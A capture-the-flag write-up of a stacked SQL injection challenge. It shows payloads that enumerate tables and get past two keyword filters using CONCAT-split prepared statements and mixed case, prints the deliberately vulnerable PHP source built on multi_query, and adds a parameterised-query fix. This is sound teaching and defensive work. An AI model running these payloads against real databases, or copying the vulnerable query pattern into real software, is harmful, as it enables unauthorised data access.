Inspecting the page source turned up nothing useful, so I submitted the number 1, which returned one array.
Next I tried the injection `1' or 1;%23`, which returned three arrays but no flag.


Trying stacked injection.
Listing the table names shows two tables, words and 1919810931114514.
Stacked injection

```sql
1' or 1;show tables;desc `1919810931114514`;desc `words`;%23
```
This lists the columns of both tables.
The words table has two columns, id and data,
while 1919810931114514 has a single column, flag,
so the flag is presumably in table 1919810931114514.
Trying the injection

```sql
1' or 1;select * from `1919810931114514`;%23
```
Response:

```php
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
```

So there is a keyword filter.
Use a prepared statement to get past the keyword filter, building the injection as follows:

```sql
1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;
#broken down:
1';  #closes the single quote
set @sql = CONCAT('se','lect * from `1919810931114514`;');  #define a variable, splicing the string with CONCAT() so the filter never sees the keyword
prepare stmt from @sql;  #prepare the SQL statement
EXECUTE stmt;  #execute the prepared statement
```
Response:

```php
strstr($inject, "set") && strstr($inject, "prepare")
```
There is a second keyword filter. Since strstr is case-sensitive while the SQL keywords set and prepare are case-insensitive,
the injection is changed to

```sql
1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;
```

which passes the filter and returns the flag.
Source code

```php
<?php
// First filter: case-insensitive regex on a keyword blocklist
function waf1($inject) {
    preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
// Second filter: case-sensitive substring checks
function waf2($inject) {
    strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {
    $id = $_GET['inject'];
    waf1($id);
    waf2($id);
    $mysqli = new mysqli("127.0.0.1","root","root","supersqli");

    // user input is interpolated into the query and run with multi_query(),
    // which is what makes the stacked injection possible
    $sql = "select * from `words` where id = '$id';";
    $res = $mysqli->multi_query($sql);
    if ($res){
      do{
        if ($rs = $mysqli->store_result()){
          while ($row = $rs->fetch_row()){
            var_dump($row);
            echo "<br>";
          }
          $rs->Close();
          if ($mysqli->more_results()){
              echo "<hr>";
          }
        }
      }while($mysqli->next_result());
    } else {
      echo "error ".$mysqli->errno." : ".$mysqli->error;
    }
    $mysqli->close();
}
?>
```
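The following is an added example, not the challenge source above and not part of the original writeup. It covers both the case-sensitivity gap in the second filter and the proper fix for the handler: a case-insensitive version of waf2 that would have caught the mixed-case payload, a small check that runs both filters over the two payload spellings from the writeup (rewritten here with a harmless `SELECT 1`), and a replacement for the `multi_query()` sink that uses one parameterised statement. Function names (`waf2_case_insensitive`, `filter_gap_demo`, `lookup_word`) are my own; the block assumes PHP 7.4+ and the mysqlnd driver, which `mysqli_stmt::get_result()` requires.

```php
<?php
// Added example (not the challenge's code). Assumes PHP 7.4+ and the mysqlnd
// driver (needed for mysqli_stmt::get_result()); function names are illustrative.

// Why the second filter fails: strstr() is case-sensitive, MySQL keywords are not.
// stripos() closes that gap. It returns an int offset or false, so the result must
// be compared with !== false (an offset of 0 would otherwise read as "not found").
function waf2_case_insensitive(string $inject): bool {
    return stripos($inject, 'set') !== false && stripos($inject, 'prepare') !== false;
}

// Runs the original check and the case-insensitive one over both payload spellings
// (constructed here with SELECT 1) and reports which check flags which spelling.
function filter_gap_demo(): array {
    $lower = "1';set @sql = CONCAT('se','lect 1;');prepare stmt from @sql;EXECUTE stmt;";
    $mixed = "1';Set @sql = CONCAT('se','lect 1;');Prepare stmt from @sql;EXECUTE stmt;";
    $original = fn(string $s): bool => strstr($s, 'set') !== false && strstr($s, 'prepare') !== false;
    return [
        'original_waf2_lower' => $original($lower),
        'original_waf2_mixed' => $original($mixed),
        'ci_waf2_lower'       => waf2_case_insensitive($lower),
        'ci_waf2_mixed'       => waf2_case_insensitive($mixed),
    ];
}

// The fix that needs no blocklist: one parameterised statement. multi_query() is gone,
// so a ';' in the input cannot start a second statement, and the bound value can never
// close the quote or change the statement's shape.
function lookup_word(mysqli $mysqli, string $id): array {
    $stmt = $mysqli->prepare('SELECT id, data FROM `words` WHERE id = ?');
    $stmt->bind_param('s', $id);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_NUM);
    $stmt->close();
    return $rows;
}

if (isset($_GET['inject'])) {
    // Connection details copied from the challenge source. In a real deployment the
    // application account should be a read-only user limited to the `words` table,
    // so that even a remaining logic bug cannot expose other tables.
    $mysqli = new mysqli('127.0.0.1', 'root', 'root', 'supersqli');
    foreach (lookup_word($mysqli, $_GET['inject']) as $row) {
        var_dump($row);
        echo '<br>';
    }
    $mysqli->close();
}
```

`filter_gap_demo()` returns true for the original check only on the lowercase spelling, and true for the stripos version on both, which is the whole gap the writeup exploits. Even the corrected check is still a substring blocklist: it fires on innocent input containing "offset" or "reset", and the first filter's `/i` regex shows that case-insensitivity alone did not stop the `CONCAT('se','lect')` trick. That is why `lookup_word` drops filtering as the security boundary and relies on the parameterised statement instead.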